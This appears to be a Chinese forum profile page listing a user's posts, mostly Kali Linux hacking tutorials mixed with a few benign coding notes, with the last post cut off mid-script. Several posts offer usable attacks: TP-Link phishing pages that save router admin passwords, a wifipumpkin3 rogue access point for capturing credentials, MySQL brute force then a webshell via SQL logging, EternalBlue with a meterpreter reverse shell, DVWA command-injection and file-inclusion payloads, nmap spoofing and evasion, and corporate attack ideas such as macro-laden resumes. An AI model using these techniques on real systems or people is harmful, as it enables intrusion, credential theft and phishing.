跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. 仿TPLINK钓鱼界面最新版 Fluxion仿TPlink钓鱼界面 优化了logo修复了版权问题美化的正确页面和失败页面优化了加载速度 下载地址仿TPINK钓鱼界面 更新到2.0支持管理员密码更新日志: 废弃了部分css修复了头部样式增加了路由器管理员密码效果 使用方法请参考文件附件,管理员密码会保存到 /root/admin.txt 中! 仿TPINK钓鱼界面管理员版 仿TPlink调用界面(管理员版)3.0发布更新日志:新增ssidMAC 信息优化了图片显示修复了标题问题和favicon 图标效果 下载仿TPINK钓鱼界面管理员版v3.0
  2. 前面的一篇文章中,提到了wifipumpkin3在kali中的安装教程。今天来看看新版的wifipumpkin全新的使用吧。 更新说明取消了原来的图形化操作界面,采用CLI界面。(类似于msfconsole的交互式界面)加入Pulps脚本功能 (类似于msf的rc)支持自定义开发插件运行wifipumpkin的运行很简单,在终端执行 wifipumpkin3即可。来看看 help命令的说明吧! help命令详解 命令说明clients显示使用高级UI在Access Point上连接的所有客户端ap显示设置AP的所有变量和状态。你可以看到(bssid,ssid,channel,security,或 statusap)set设置变量代理,插件和访问点,此命令集类似于metasploit set命令start启动接入点(AP)info从代理/插件获取信息,此命令显示代理/插件的一些信息,例如(日志路径,配置路径,描述)mode显示所有可用的无线模式plugins显示所有可用的插件及其状态。use为模块选择模块,充分激发metasploit模块的灵感dump从连接在AP上的客户端转储信息 牛刀小试在终端分别执行下面命令 #设置无线网卡 set interface wlan0 #设置无线网信号 set ssid bbskali.cn #设置插件 set proxy noproxy #开启dns转发 ignore pydns_server #开始攻击 start效果如下 如上,对应的插件也激活了。 这时,我们会看到一个名为 bbskali.cn的ssid 当设备连接后,我们便可以获得一些相应的信息。比如账号和密码等信息 后期我们在说说如何开发wifipumpkin的插件。详情可以访问论坛bbskali.cn
  3. wifipumpkin是一个恶意AP框架,可轻松创建这些虚假网络,同时将合法流量往返于毫无戒心的目标之间。它具有各种功能,包括流氓Wi-Fi接入点,对客户端AP的deauth攻击,探测请求和凭据监视器,透明代理,Windows更新攻击,网络钓鱼管理器,ARP中毒,DNS欺骗。此外,wifipumpkin是一个非常完整的框架,用于审核Wi-Fi安全性,检查功能列表非常广泛。 新版功能介绍恶意访问点攻击中间人攻击取消身份验证攻击模块额外捕获烧瓶模板的模块Rogue Dns服务器俘虏门户攻击(captiveflask)拦截,检查,修改和重放网络流量WiFi网络扫描DNS监控服务凭证收集透明代理LLMNR,NBT-NS和MDNS中毒器(Responder3) 安装环境要求Python(3.7版或更高版本)不支持Windows不支持Mac OSX 在Kali Linux上安装默认情况下,Kali Linux已与python3.8兼容,但是还需要安装些依赖关系 sudo apt install libssl-dev libffi-dev build-essential git clone https://github.com/P0cL4bs/wifipumpkin3.git cd wifipumpkin3 安装PyQt5在新版的kali中,已经安装了PyQt5 检查pyqt5是否成功安装: python3 -c "from PyQt5.QtCore import QSettings; print('bbskali.cn')"要是显示bbskali.cn则证明安装 编译安装sudo python3 setup.py install 果在下面看到此消息,一切正常! wifipumpkin3 == 1.0.0的已完成处理依赖性 现在,让我们执行该应用程序: wifipumpkin3 可见,本次更新的内容还是比较多的。最大的更新是取消了原来的图形化界面,采用类似msfconsole的交互式界面。
  4. 如何简单方便的获取当前树莓派的运行温度呢? 方法一: 进入操作目录 cd /sys/class/thermal/thermal_zone0 查看温度 cat temp 树莓派的返回值 37540 返回值除以1000为当前CPU温度值。即当前温度为37摄氏度。 方法二:利用python获取树莓派的温度 #-*- coding: utf-8 -*- #打开文件 file = open("/sys/class/thermal/thermal_zone0/temp") #读取结果,并转换为浮点数 temp = float(file.read()) / 1000 #关闭文件 file.close() #向控制台打印 print "temp : %.1f" %temp 执行脚本 python wd.py 执行返回 temp : 37.2 通过这两种方法,我们便实现了树莓派温度的获取。
  5. Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。 一:利用nmap对目标进行信息收集命令如下: nmap -T4 -A 192.168.123.239 从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。 二:对目标站点进行扫描命令如下: dirb http://192.168.123.239 通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。 在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。 三:利用nmap暴力破解mysql命令如下: nmap -p 3306 --script=mysql-brute.nse 192.168.123.239 如上,通过暴力破解,我们得到了账号和密码为root和123456 四:尝试远程登录命令如下: mysql -h 192.168.123.239 -u root -p成功登录数据库 利用phpMyAdmin拿shell在前期的文章中提到过,我们先登录到phpMyAdin 执行下面的sql语句 SET GLOBAL GENERAL_log='on'; SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php'; SELECT '<?php phpinfo(); ?>';需要注意的是,一定要写对目标的站点根目录的绝对地址 执行完成后,会在更目录生成一个cmd.php文件,我们访问效果如下: 利用此种方式,便可成功拿shell。 五:利用nmap扫描目标主机漏洞命令如下: nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn扫描结果如下: 可以看到,目标存在ms17-010 ms10-054 CVE-2017-0143等漏洞。 六:配合msfconsole那些系统权限命令如下: use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.123.66 set payload windows/x64/meterpreter/reverse_tcp exploti 通过上诉示例,我们利用nmap从简单的信息收集到拿shell。一次完整的渗透测试就完成了。
  6. 利用adb命令,我们可以连接Android手机,在kali中如何配置安装呢? 安装adb我们利用apt命令安装即可 apt-get install adb开启手机的usb试调 测试连接adb devices 显示手机中的所有应用adb shell pm list packages 查看手机电池情况adb shell dumpsys battery屏幕截图感觉这个功能很实用,很隐蔽。 adb exec-out screencap -p > bbskali.png 录制屏幕录制屏幕以 mp4 格式保存到 /sdcard: adb shell screenrecord /sdcard/filename.mp4需要停止时按 Ctrl-C,默认录制时间和最长录制时间都是 180 秒。 如果需要导出到电脑: adb pull /sdcard/filename.mp4
  7. 前面几期的文章中说过,如何利用花生壳等工具搭建内网映射。实现外网访问我们的内网,但是由于花生壳等软件不稳定而且慢最重要的是还有点小贵。由于笔者运维着几天服务器,就想着利用frp搭建内网穿透。 原理 前期准备vps服务器(必须)路由器(可选)树莓派(可选) 下载安装服务端- frps首先到 frp 的 releases 页面下载最新版的对应 VPS 的处理器架构的压缩包 https://github.com/fatedier/frp/releases 如何知道 VPS 的处理器架构?在 VPS 上运行这个命令: arch如果输出x86_64则需要下载带linux_amd64的那个压缩包; 如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包 以x86_64架构举例 如果下载比较慢可以到https://file.kskxs.com/?dir=frp/frp-v0.32.1这里去下载 下载后,上传到服务器并解压,或者利用下面方式解决。 cd /root #下载 wget --no-check-certificate https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz #解压 tar -xzvf frp_0.33.0_linux_amd64.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.18.0_linux_amd64 frp cd frp #确保 frps 程序具有可执行权限 chmod +x frps测试./frps --help 配置服务器端程序参考以下配置文件frps.ini #下面这句开头必须要有,表示配置的开始 [common] #frp 服务端端口(必须) bind_port = 7000 #frp 服务端密码(必须) token = 12345678 #认证超时时间,由于时间戳会被用于加密认证,防止报文劫持后被他人利用 #因此服务端与客户端所在机器的时间差不能超过这个时间(秒) #默认为900秒,即15分钟,如果设置成0就不会对报文时间戳进行超时验证 authentication_timeout = 900 #仪表盘端口,只有设置了才能使用仪表盘(即后台) dashboard_port = 7500 #仪表盘访问的用户名密码,如果不设置,则默认都是 admin dashboard_user = admin dashboard_pwd = admin #如果你想要用 frp 穿透访问内网中的网站(例如路由器设置页面) #则必须要设置以下两个监听端口,不设置则不会开启这项功能 vhost_http_port = 10080 vhost_https_port = 10443 #此设置需要配合客户端设置,仅在穿透到内网中的 http 或 https 时有用(可选) #假设此项设置为 example.com,客户端配置 http 时将 subdomain 设置为 test, #则你将 test.example.com 解析到服务端后,可以使用此域名来访问客户端对应的 http subdomain_host = example.com到处,我们服务器端就配置完成了。 启动frp./frps -c frps.ini #后台运行 nohup /root/frp/frps -c /root/frp/frps.ini & #结束 pkill frps客户端 - frpc下载Windows客户端,打开frpc.ini开始配置 配置ssh这里我们开始映射路由器的22端口 配置如下: [common] server_addr = xxx.xxx.xxx.xxx #公网服务器IP server_port = 7000 #(和frps一致) token = 12345678 #(和frps一致) [ssh] type = tcp local_ip = 192.168.123.1 #内网IP local_port = 22 #内网端口 use_encryption = false use_compression = false remote_port = 6000 #自定义转发端口配置完成后,切换到cmd命令 执行frpc.exe命令 这时,我们可以利用 xxx.xxx.xxx.xxx:6000(xxx为公网IP)登录到我们的ssh服务器了。 配置http[router-web] type = http local_ip = 192.168.123.1 local_port = 80 remote_port = 10080 custom_domains = xxx.xxx.xxx.xxx如上,我们可以利用公网IP:10080访问路由器的登录界面 需要注意的是,凡是上述的端口都需要在防火墙中开启。 配置路由器上述的方法,需要我们的pc(即客户端一直在线),但是现实中有点不允许,因为你的电脑不可能长时间开着,所以我们可以配置我们的路由器。 老毛子固件配置方案登录路由器,在frp选项中开启并配置参数即可。 并在外部网络——端口转发添加规则即可 这样,我们便不需要长期开着电脑,从而可以实现端口转发。当然本文是将所有的功能转发到路由器上,当然你可以转发到局域网内的任意一台设备上。 生成msf外网shell因为我在路由器中直接配好了端口转发,所以无需在kali中配置端口转发,直接生成外网木马。成功得到shell 需要注意的是,在生成shell时填写的是外网的IP和端口,本地配置msf时填写的内网的IP
  8. TheHarvester能够收集电子邮件账号、用户名、主机名和子域名等信息。它通过Google、Bing、PGP、LinkedIn、Baidu、Yandex、People123、Jigsaw、Shodan等公开资源整理收集这些信息。 使用命令optional arguments: -h, --help show this help message and exit -d DOMAIN, --domain DOMAIN company name or domain to search -l LIMIT, --limit LIMIT limit the number of search results, default=500 -S START, --start START start with result number X, default=0 -g, --google-dork use Google Dorks for Google search -p, --port-scan scan the detected hosts and check for Takeovers (21,22,80,443,8080) -s, --shodan use Shodan to query discovered hosts -v, --virtual-host verify host name via DNS resolution and search for virtual hosts -e DNS_SERVER, --dns-server DNS_SERVER DNS server to use for lookup -t DNS_TLD, --dns-tld DNS_TLD perform a DNS TLD expansion discovery, default False -n, --dns-lookup enable DNS server lookup, default False -c, --dns-brute perform a DNS brute force on the domain -f FILENAME, --filename FILENAME save the results to an HTML and/or XML file -b SOURCE, --source SOURCE baidu, bing, bingapi, certspotter, crtsh, dnsdumpster, dogpile, duckduckgo, github-code, google, hunter, intelx, linkedin, linkedin_links, netcraft, otx, securityTrails, spyse(disabled for now), threatcrowd, trello, twitter, vhost, virustotal, yahoo, all示例通过百度查找域名bbskali.cn的相关信息 theHarvester -d bbskali.cn -l 500 -b baidu
  9. 常在水边走,哪有不湿鞋的道理。一不小心就会上当受骗,当我们上当受骗后第一时间想到的是怎样获取骗子的个人信息。而这里QQ便是我们骗子的联系媒介。 方式一利用电子邮件登录QQ邮箱,给目标发送邮件!需要注意的是,你邮件的内容一定具有一定的诱惑性,能诱导对方回复你。 比如招聘,商务合作等等。 如果一切顺利的话,我们会收到对方的邮件。点击收件箱打开收到的邮件。 点击显示邮件原文 这样我们便可以得到对方的IP 方式二 利用探针利用php写一个获取目标信息的文件,访问该文件便会记录对方的信息到数据库。 以下是随便写的,可以参考下! <!doctype html> <html> <head> <meta charset="utf-8"> <title>kali论坛 bbskali.cn</title> </head> <?php function GetOs() { if (!empty($_SERVER['HTTP_USER_AGENT'])) { $OS = $_SERVER['HTTP_USER_AGENT']; if (preg_match('/win/i', $OS)) { $OS = 'Windows'; } elseif (preg_match('/mac/i', $OS)) { $OS = 'MAC'; } elseif (preg_match('/linux/i', $OS)) { $OS = 'Linux'; } elseif (preg_match('/unix/i', $OS)) { $OS = 'Unix'; } elseif (preg_match('/bsd/i', $OS)) { $OS = 'BSD'; } else { $OS = 'Other'; } return $OS; } else { return "获取访客操作系统信息失败!"; } } ?> <!--浏览器信息--> <?php function GetBrowser() { if (!empty($_SERVER['HTTP_USER_AGENT'])) { $br = $_SERVER['HTTP_USER_AGENT']; if (preg_match('/MSIE/i', $br)) { $br = 'MSIE'; } elseif (preg_match('/Firefox/i', $br)) { $br = 'Firefox'; } elseif (preg_match('/Chrome/i', $br)) { $br = 'Chrome'; } elseif (preg_match('/Safari/i', $br)) { $br = 'Safari'; } elseif (preg_match('/Opera/i', $br)) { $br = 'Opera'; } else { $br = 'Other'; } return $br; } else { return "获取浏览器信息失败!"; } } ?> <?php //获取ip function getip() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP") , "unknown")) { $ip = getenv("HTTP_CLIENT_IP"); } else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR") , "unknown")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); } else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR") , "unknown")) { $ip = getenv("REMOTE_ADDR"); } else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) { $ip = $_SERVER['REMOTE_ADDR']; } else { $ip = "unknown"; } return $ip; } //获取地址 function getLocation($ip = '') { empty($ip) && $ip = getip(); if ($ip == "127.0.0.1") return "本机地址"; $api = "http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=json&ip=$ip"; //请求新浪ip地址库 $json = @file_get_contents($api); $arr = json_decode($json, true); $country = $arr['country']; $province = $arr['province']; $city = $arr['city']; if ((string)$country == "中国") { if ((string)($province) != (string)$city) { $_location = $province . $city; } else { $_location = $country . $city; } } else { $_location = $country; } return $_location; } ?> <body> <p>你的操作系统:<?php echo GetOs ();?></p> <p>你的浏览器:<?php echo GetBrowser ();?></p> <p>你的IP地址:<?php echo getip ();?></p> </body> </html>将上面文件保存到服务器。我们访问的话便可以得到对方的IP
  10. DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 下载安装点击下面的连接开始下载,并配置config.inc.php文件。 $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'dvwa'; $_DVWA[ 'db_password' ] = '123456';更改为你的数据库账号信息。 登录创建数据库访问http://127.0.0.1输入账号和密码均为admin点击Create / Reset Database创建数据库,当数据库创建完成后,会自动登出,用户名:admin密码:password重新登录。 配置完成后的界面 这样dvwa的安装和配置就完成了。 在dvwa security选项中,可以调整dvwa的难易程度, Brute Force(low)Brute Force即为暴力破解,通过枚举获取管理员的账号和密码,在实际的操作中,一般用来破解后台管理系统的登录。 准备user.txt pass.txt(用户字典和密码字典)神器burp 在burp中抓包打开浏览器,在该模块任意输入账号和密码,在burp中抓包。 抓到包后,右键send ro intruder 在intruder的positions选择中,先点击clear$清除所有的变量。 然后分别给username和password这两个字段后面的内容添加add$ 并将attack type的值设置为cluster bomb 在payloads选择中分别给payload 1和payload 2设置字典路劲。 然后点击上方的start attack 如上,开始枚举破解。 通过length的长度判决即可。 通过上面的破解,我们发现length的长度存在不一样,大的为破解成功的账号和密码。 Brute Force(medium)中等等级的暴力破解和低等级的相同,只是低等级的暴力破解可以进行sql注入,而中等级的把其中的字符串给过滤掉了,但是操作相同。 需要注意的是中级的暴力破解相对来说较慢是因为有个sleep函数,在破解失败后会使程序停止运行两秒。 Brute Force(higt)高等级的暴力破解和低等级、中等等级的暴力破解不相同,它增加了一个user_token参数,所以增加了爆破难度,但是依然可以破解 通过和low的对比,多了一个token参数。 将抓到的包发送到intrude,选择攻击模式为pitchfock,并且给要破解的项带上美元符号 在options选项中,找到grep-extact 找到Redirections模块设置允许重定向,选择always 设置密码本,点击payload,选择第一项的密码本与低等级的相同,第二项的时候选择Recursive grep 并且把之前得到的token值粘贴到下方的方框中。 破解效果 命令注入 Command Injection命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者 命令)的一种注入攻击手段。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。 命令连接符command1 && command2 &&表示先执行command1,执行成功后执行command 2,否则不执行command 2 command1 & command2 $表示先执行command 1,不管是否成功,都会执行command 2 command1 || command2 ||表示先执行command1,执行失败后,执行command2 low我们先选输入一个ip地址,发现是对ip地址的ping功能 解决乱码问题解决此问题的方法:在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312”,即可。 利用 192.168.0.1 && net user Medium级别服务端代码解读 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set blacklist $substitutions = array( '&&' => '', ';' => '', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); } // Feedback for the end user echo "<pre>{$cmd}</pre>"; } ?>可以看到,相比Low级别的代码,服务器端对ip参数做了一定过滤,即把”&&” 、”;”删除,本质上采用的是黑名单机制,因此依旧存在安全问题。 漏洞利用 127.0.0.1 & ipconfig High代码解读 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutions = array( '&' => '', ';' => '', '| ' => '', '-' => '', '$' => '', '(' => '', ')' => '', '`' => '', '||' => '', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); } // Feedback for the end user echo "<pre>{$cmd}</pre>"; } ?> 相比Medium级别的代码,High级别的代码进一步完善了黑名单,但由于黑名单机制的局限性,我们依然可以绕过。 漏洞利用 黑名单看似过滤了所有的非法字符,但仔细观察到是把| (注意这里|后有一个空格)替换为空字符,于是 |成了“漏网之鱼”。 127.0.0.1|dir 跨站请求(csrf)CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 low级别我们先对其抓包 也就是说,当我们访问http://127.0.0.1/vulnerabilities/csrf/?password_new=888888&password_conf=888888&Change=Change我们的密码就会改变,我们可以伪造这条链接,发送给受害者,在不知不觉中对方的密码就会被修改。 MediumMedium级别的代码检查了保留变量 HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,及要访问的主机名,这里是192.168.153.130),希望通过这种机制抵御CSRF攻击。 漏洞利用 过滤规则是http包头的Referer参数的值中必须包含主机名(这里是192.168.153.130) 我们可以将攻击页面命名为192.168.153.130.html(页面被放置在攻击者的服务器里,这里是10.4.253.2)就可以绕过了 higHigh级别的反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。 试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击。 File Inclusion(文件包含)File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。 low我们先点击file1.php 效果如下: 在bur中对其抓包 读取任意文件测试,我们在D盘新建一个txt 构造下面命令: 读取d盘下的bbskali.txt文件 http://192.168.123.129/vulnerabilities/fi/?page=D:\bbskali.txt 访问远程文件 http://192.168.123.129/vulnerabilities/fi/?page=http://192.168.123.129/22.php 这样便完成了文件包含攻击。 MediumMedium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为空字符,即删除。但是对相对路劲的限制没多大。 http://192.168.123.129/vulnerabilities/fi/?page=hthttp://tp://192.168.123.129/22.php 当然,上面的方法比较麻烦的话,我们可以尝试将url进行编码。这样便躲过了规则的限制。 HighHigh级别的代码规定只能包含file开头的文件,看似安全,但依然可以利用file协议绕过防护策略。 文件上传(File Upload)利用文件上传,我们可以上传我们的一句话木马,很方便的会获得系统shell low我们建立一个php文件,浏览后直接上传成功。 medium如果我们直接上传,会提示如下Your image was not uploaded. We can only accept JPEG or PNG images.可以看到,对上传的文件做出了要求,必须是jpg和png 解决方法 抓包修改文件类型即可 如下,成功上传。 还有一种方法就是将php的后缀改成jpg,然后在burp中将其重新改回php即可。 high要求上传的文件类型必须为:”.jpg”、”.jpeg” 、”*.png”之一,同时限制了文件的长度。 所以,一种简单的方法就是,合成图片木马。但是这种方法受到php环境的限制,有时不能成功解析php图片木马。 最佳方案 图片木马配合命令注入 我们先做一个图片木马 GIF98 <?php phpinfo(); ?> 然后在命令注入模块中,执行下面命令 127.0.0.1 & copy D:\phpstudy_pro\WWW\hackable\uploads\22.jpeg D:\phpstudy_pro\WWW\hackable\uploads\aa.php 成功将图片转变为php SQL Injectionlow首先我们对其进行抓包 废话不说,神器sqlmap走一波 sqlmap -u "http://192.168.123.129//vulnerabilities/sqli/?id=1&Submit=Submit" --dbs提示302跳转到了登录页面 所以,我们要在命令中加入cookie保存会话的在线 在burp抓到的包里面,我们复制PHPSESSID=ff4rv0j6rkgv9fnqlvfmhch8bh; security=low放到sqlmap即可。 所以,最终的命令为: sqlmap -u "http://192.168.123.129//vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=ff4rv0j6rkgv9fnqlvfmhch8bh; security=low" --dbs成功爆出数据库 其他的后续操作我这里就不在啰嗦了。 medium同样的方法,还时对其抓包 通过抓包和low的对比发现,由原来的get方式变成了post 将抓到的包复制另存为bbskali.txt 执行如下命令; sqlmap -r "/root/bbskali.txt" --dbs 未完待续,好累?睡觉了!明天接着码字!
  11. 防火墙是位于计算机和他网络连接直接的软件。防火墙能对经过的他的网络流量进行分析,并过滤掉一些攻击。当然防火墙可以关闭和隐藏部分端口,以免暴露和利用。最后它可以禁止指定的ip访问。 参数说明: 选项数量-f报文分段--mtu指定偏移大小-DIP欺骗-sI源地址欺骗--source-port源端口欺骗--data-length指定发包长度--spoof-macMAC地址欺骗--randomize-hosts目标主机随机排序报文分段在nmap中利用-f将TCP包分段在几个包中,使得包过滤器的检测更加困难。 nmap -f -v 192.168.123.1 指定偏移大小使用--mtu来指定偏移大小,设定TCP/IP协议的传输最大值,以此来逃避防火墙。需要注意的是偏移量是8的倍数。 nmap --mtu 32 192.168.123.1 IP欺骗使用-D选项就可以达到IP欺骗的目的,使用该选项在进行扫描时,在随机产生IP地址扫描而非我们真实的IP扫描。 使用-D选项可以指定多个IP或者使用RND随机生成几个IP地址。 nmap -D RND:11 192.168.123.1 源地址欺骗/源端口欺骗使用-sI就可以进行源地址欺骗,使用--source-port就可以进行源端口欺骗,通过这种攻击管理员可能会认为这种端口不会有攻击发生。 nmap --source-port 53 192.168.123.1 mac地址欺骗使用--spoof-mac便可以进行mac欺骗扫描,在扫描时我们使用0随机分配一个mac地址。
  12. 在局域网内,我们如何查看有哪些主机存活呢?本文将会告诉你! 利用nmap推荐指数:☆☆☆☆☆ 命令如下: nmap -sP 192.168.123.1/24当前命令即可查看当前局域网内有拿些存活的主机。 利用fping推荐指数:☆☆☆☆ 命令如下: fping -a -g 192.168.1.1/24参数说明: -a :显示存活的(alive) -g : 指定一个范围 (group) -u : 显示不存活的(unreacheable)。和-a 是取反的效果 使用hping3推荐指数:☆☆☆☆ Hping3 主要有以下典型功能应用: 防火墙测试端口扫描Idle扫描拒绝服务攻击 利用masscanmasscan十分强大,可以配合nmap两者同时使用。称为世界上最快的端口扫描器! 推荐指数:☆☆☆☆☆ 扫描存活主机 masscan --ping 192.168.123.1/24 --rate 1000000 扫描指定网段范围的指定端口 masscan -p80,8080-8100 10.0.0.0/8
  13. 互联网时代,无论是个人还是企业都已经离不开网络。而网络安全问题却是企业中最薄弱的一环。除了一些知名的网络安全公司外,另外一些企业在网络安全领域几乎是0,本文将会为您阐述当前企业所面临的网络安全问题。 当前企业所面临的网络安全问题员工网络安全意识淡薄。缺乏专业的网络全运维人士。缺乏专业的IT专员。设备陈旧,能用就行。IT人员地位低,删库跑路时有发生。老板只顾赚钱,忽略细节问题。 企业网络安全——“内忧外患”内忧:公司内部发生的网络安全问题,如删库跑路,间谍等。 外患:来自外部的恶意攻击。 内忧通常都是员工计算机操作能力低下,操作失误,工作心态等问题导致的安全问题。 内忧之删库跑路 删库跑路原因无非有一下两点 员工存在报复心态员工失误操作 内忧之员工业务能力低下企业中,由于部分员工缺乏相应的安全知识和技能,导致设备中毒是常有的事。如要下载某个软件,不去官网下载而是直接去度娘下载。结果下载的软件全是广告推广程序。在或者有的员工喜欢在上班期间搞点小刺激,看会儿小片儿,结果下载的全是病毒。 外患常见的攻击方法基于WiFi的攻击 首先对目标公司进行信息收集,法人信息,公司地理位置,座机号码等信息。(小公司的座机号码一般都是宽带账号,利用座机号码打客服电话可以查看公司的宽带账号。) 破解WiFi 对于公司而言,一个万能钥匙拯救一切,因为员工都懒得输密码。要么都是很简单的那种密码。 那么问题来了,WiFi的信号范围都是有限的,我该如何连接WiFi呢。总不能跑到人家办公室吧? 如上,我们可以在这个范围内借助一些大功率无线网卡实现攻击。 通过WiFi我们可以进入公司的内网,从而实现对公司设备的控制权。 基于树莓派的攻击 当WiFi无法利用时,我们可以利用树莓派实现跳板。从而实现攻击。 当然,前提是需要解决树莓派的电源问题。 基于badusb的攻击 我们可以伪装长外卖小哥,或者扫地大妈。实现对内网的渗透。当然你也可以调戏下前台小姐姐。 基于HR的攻击 我们可以在本市的招聘平台去查找有关公司的招聘信息,HR肯定会留下相应的联系方式。发送带有宏的简历,轻松拿下shell。 相关建议勿将小事当儿戏。进行相关网络安全培训,提高员工网络安全意识。及时更新相关软硬件设备。ps:文中部分图片来源于网络,如有侵权请联系我们删除。
  14. typecho是一款简介的博客程序,由于友情链接links存在越权漏洞。导致不少的站吃了亏。今天我们来看看该漏洞是如何复现的。 环境搭建我在本地搭建了typech和插件links 跨站测试 如图,成功执行xss,我们可以利用其获取管理员cookie,这样就可以登录后台了。
  15. 我们在生成各种shell的时候,都是通过MSFvenom的Payload生成的。需要配置各种参数。今天给大家介绍一下,如何在kali中更加简单的生成shell吧。 安装msfpcapt-get install msfpc生成windows下shellmsfpc windows选择我们的网络端口,这里我选本地局域网2 需要注意的是 默认的端口是443 http://https//niu.bbskali.cn/72f84ef50b8136cb1f21983a66e365ad-blogsy 只因太懒这时,我们的桌面会有两个文件,一个是shell程序,一个是msfconsole的rc文件。 在目标端运行shell后,我们只需要执行下面命令即可得到shell msfconsole -r xx.rc成功得到反弹 其他shell同样的方式,要想生成其他shell.我们只需要执行msfpc后跟linux apk php即可 优缺点优点:快捷 方便 适合懒人 缺点:功能没有MSFvenom强大。
  16. mysql求和首先来看看数据库的结构 Idnameywsxlssum 1张三67458078 2李四67778998 3逍遥子78886789 求列的和比如,我现在要求字段yw的总和。 select sum(yw) from chengji; 求行的和比如,我现在要求张三的yw sx ls sum的和 select name, (yw+sx+ls+sum) as zonghe from chengji; 平均值求yw的平均值 select AVG(yw) from chengji; 最大值 最小值select max(yw) from chengji; select min(yw) from chengji;
  17. 采用Ajax,通过php,从mysql取出数据,然后将数据使用ECharts展示。如果想要动态刷新图标,那么设置一个定时器,定时取数,就可以达到目的。 数据库数据库名:kali 表名:ecahrts 字段有:id city sun av qs详细结构如下: Idcitysunavqs 1我15006781342 2非18004651245 3常2000346665 4的12004561432 5帅1750785412 配置php文件<?php $mysqli=new mysqli('127.0.0.1','root','123456','kali'); mysqli_query($mysqli,"set names 'utf8'"); $sql="SELECT * FROM ecahrts"; $result = $mysqli->query($sql,MYSQLI_USE_RESULT); if($result){ $i=0; $categories=array(); $datas=array(); while($row = $result->fetch_assoc()) { $categories[$i]=$row['city']; $datas[$i]=$row['sun']; $datas1[$i]=$row['av']; $datas2[$i]=$row['qs']; $i=$i+1; } $arr=array('categories'=>$categories,'data'=>$datas,'data1'=>$datas1,'data2'=>$datas2); echo json_encode($arr); } $mysqli->close(); ?>主要参数说明: 读取数据库中的数据,并且复制给数组$arr 验证 将上面php保存为api.php,访问127.0.0.1/api.php 这里需要注意的是,在数据库中我的字段city是中文。Ajax读取数据后是乱码,于是我采用mysqli_query($mysqli,"set names 'utf8'");将其通过php编码即可。 绘制图表引用各种js <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts-gl/dist/echarts-gl.min.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts-stat/dist/ecStat.min.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts/dist/extension/dataTool.min.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts/map/js/china.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts/map/js/world.js"></script> <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/echarts/dist/extension/bmap.min.js"></script> <script 